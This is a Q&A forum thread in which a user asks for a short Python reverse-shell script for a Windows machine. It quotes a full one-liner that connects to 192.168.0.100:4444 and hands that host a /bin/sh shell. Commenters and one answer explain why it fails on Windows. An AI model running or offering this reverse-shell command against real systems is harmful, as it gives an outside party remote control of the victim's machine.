# Python Reverse shell

Tags: python, shell

I am trying to get a reverse shell from a windows machine (python installed). Is there a short script to do that?

I tried using the following script:

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

All the attempts failed, giving out the following error:

```
Errno 9:Bad file descriptor
```

Any help would be appreciated.

Comment: Can you isolate which instruction is generating the error?

Comment: Do you get the same error if you save your script as a `.py` file and execute that? It will be easier to debug if it's not all squished onto one line.

Comment: are you using python2.7?

Comment: @ScottHunter os.dup2(s.fileno,0), os.dup2(s.fileno,1), os.dup2(s.fileno,2) are generating the error

Comment: @maggick yes in windows!

Comment: @Kevin I saved my script in .py file, before executing, if 'os.dup2(s.fileno,0), os.dup2(s.fileno,1),os.dup2(s.fileno,2) are deleted there are no errors

Comment: `socket.fileno` gives you an integer, but `os.dup2` wants file descriptors as parameters. Have you tried something like `open(s.fileno())`? Same for the second parameter.

Comment: @tobias_k I haven't tried that, can you please give the example code of the modification you are stating?

Answer (score 2):

Your code won't work on Windows (but you already knew that).

Here is the documentation saying that it won't work:

> Under Windows the small integer returned by this method cannot be used where a file descriptor can be used (such as os.fdopen()).
>
> https://docs.python.org/2/library/socket.html#socket.socket.fileno